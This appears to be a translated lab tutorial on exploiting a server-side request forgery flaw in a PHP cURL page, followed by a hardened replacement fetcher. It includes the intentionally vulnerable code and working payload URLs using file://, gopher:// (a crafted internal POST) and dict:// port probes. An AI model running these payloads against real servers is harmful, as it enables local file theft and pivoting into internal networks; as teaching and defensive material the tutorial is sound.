SSRF exploitation (part 2)

0x01 Overview

The first part covered the general use of SSRF: probing the network over http and attacking Redis on the internal network. This part extends the use of the SSRF vulnerability through the file, dict and gopher protocols.

0x02 Experimental environment

Attacker: 192.168.220.140

Target host with the SSRF vulnerability: 192.168.220.143

Internal-network host to be attacked: 192.168.220.144


The page with the SSRF vulnerability is http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php; its code is as follows:

<?php
// create a new cURL resource
$ch = curl_init();
// set URL and the appropriate options
// the user-supplied url parameter is handed to cURL unchecked: this is the SSRF
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, false);
// grab URL and pass it to the browser
curl_exec($ch);
// close cURL resource, and free up system resources
curl_close($ch);
?>

[1] Reading files via the file protocol

Visit http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=file:///C:/WINDOWS/win.ini and the file is read successfully.


[2] Sending a POST request to an internal system via the gopher protocol

Suppose there is an internal system (http://192.168.220.144/bWAPP/post.php) that accepts POST requests, with the following code:

<html>
<head>
    <title>post</title>
</head>
<body>
    <?php
    // echoes the cmd parameter of the GET or POST request back to the client
    echo $_REQUEST['cmd'];
    ?>
</body>
</html>


With the curl command and the gopher protocol, a POST request can be sent to http://192.168.220.144/bWAPP/post.php, for example by running the following command directly:


curl 'gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=aaaaaaaa'


Checking the system log on 192.168.220.144 shows a new record of a POST request from 192.168.220.142.


The SSRF vulnerability can likewise be used with the gopher protocol to send a POST request to the internal system, but first check phpinfo to confirm that curl is enabled. The curl version here is 7.38.0 (with 7.21.0 the reproduction did not succeed, which is a pitfall: if the version is too low, switch phpstudy to a higher PHP version; on Linux, simply update directly).


Then it can be accessed through the URL:

http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=qqq

Checking the system log on 192.168.220.144 shows a new record of a POST request from 192.168.220.143:


A packet capture in Ethereal shows that 192.168.220.143 really did send a POST request to 192.168.220.144; host 143 acted as the springboard (pivot) machine.


The attack process is as follows:


[3] Reading the version of the service running on a target port via the dict protocol

Visit: http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=dict://192.168.220.143:3306


Or visit: http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=dict://192.168.220.144:80
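All three protocol abuses above come down to ssrf_demo.php handing a user-supplied URL to cURL with no restrictions. As an added example (not code from the original post), here is a hardened replacement for that fetcher: it accepts only http/https, so file://, dict:// and gopher:// are refused both by the scheme check and by CURLOPT_PROTOCOLS; it rejects hosts that resolve to private or reserved addresses such as 192.168.220.144; it pins the checked address with CURLOPT_RESOLVE; and it disables redirects. The function names fetch_public_url and is_public_ip are my own.

```php
<?php
// Hardened fetcher (added example, not the original post's code).
// Assumption: the only legitimate use is fetching public http(s) resources.

function is_public_ip($ip) {
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 and fc00::/7;
    // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1 and similar.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function fetch_public_url($url) {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Reject file://, dict://, gopher:// and every other scheme up front.
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    $host = $parts['host'];
    $port = isset($parts['port']) ? $parts['port'] : ($scheme === 'https' ? 443 : 80);
    // Resolve once, check the address, then pin it for cURL so a second
    // lookup (DNS rebinding) cannot swap in an internal address.
    $ip = gethostbyname($host);   // returns $host unchanged on failure -> rejected below
    if (!is_public_ip($ip)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,  // a 302 to 192.168.x.x would bypass the check
        CURLOPT_RESOLVE         => ["$host:$port:$ip"],
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_RETURNTRANSFER  => true,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$result = fetch_public_url(isset($_GET['url']) ? $_GET['url'] : '');
if ($result === false) {
    http_response_code(400);
    echo 'URL not allowed';
} else {
    echo $result;
}
```

With this in place, the three requests shown above (file:///C:/WINDOWS/win.ini, gopher://192.168.220.144:80/..., dict://192.168.220.144:80) all receive a 400 response instead of being forwarded.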



Origin: www.cnblogs.com/flokz/p/11610048.html